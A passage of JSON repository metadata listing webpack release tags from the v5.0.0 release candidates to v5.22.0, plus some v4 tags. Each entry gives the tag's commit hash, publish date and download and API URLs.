cy_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-